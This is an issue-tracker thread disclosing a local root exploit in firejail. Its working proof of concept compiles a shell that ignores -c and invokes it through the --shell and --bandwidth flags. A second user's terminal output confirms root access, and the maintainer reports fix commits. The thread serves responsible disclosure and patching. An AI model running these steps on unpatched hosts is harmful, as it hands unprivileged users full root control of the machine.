Root shell via --bandwidth and --shell

[mcarpenter]

[Against current HEAD, commit 64355]

In a first window run:

$ firejail --noprofile --name=x --net=eth0

In a second window, firstly create a dumb shell that ignores -c:

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -

and then secondly invoke that shell via the --shell and --bandwidth flags to obtain root:

$ firejail --shell=./dumbshell --bandwidth=x status
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0

Error occurs at

firejail/src/firejail/bandwidth.c

Lines 445 to 451 in 6435525

	char *arg[4];
	arg[0] = cfg.shell;
	arg[1] = "-c";
	arg[2] = cmd;
	arg[3] = NULL;
	clearenv();
	execvp(arg[0], arg);

char *arg[4];
arg[0] = cfg.shell;
arg[1] = "-c";
arg[2] = cmd;
arg[3] = NULL;
clearenv();
execvp(arg[0], arg);

I don't see any good reason to permit a user-specified shell to run a bandwidth command.

[Fred-Barclay]

I can confirm this is "working" in Arch with firejail built from latest source. 😦
$ $ firejail --noprofile --name=x --net=enp6s0

$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -
<stdin>: In function ‘main’:
<stdin>:1:13: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
$ firejail --shell=./dumbshell --bandwidth=x status
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(fred)
sh-4.4# ls /root
Desktop
sh-4.4# whoami
root
sh-4.4# touch /root/bad_dir
sh-4.4# ls /root
Desktop  bad_dir
sh-4.4# 

EDIT: --noprofile isn't actually needed. $ firejail --name=x --net=enp6s0 works just as well.
EDIT:

[netblue30]

This one was quite stupid, thanks for finding it!

Fix on mainline: 5d43fdc

Pushed also a fix on 0.9.44-bugfix branch. Interesting, we don't have this on 0.9.38-LTS branch.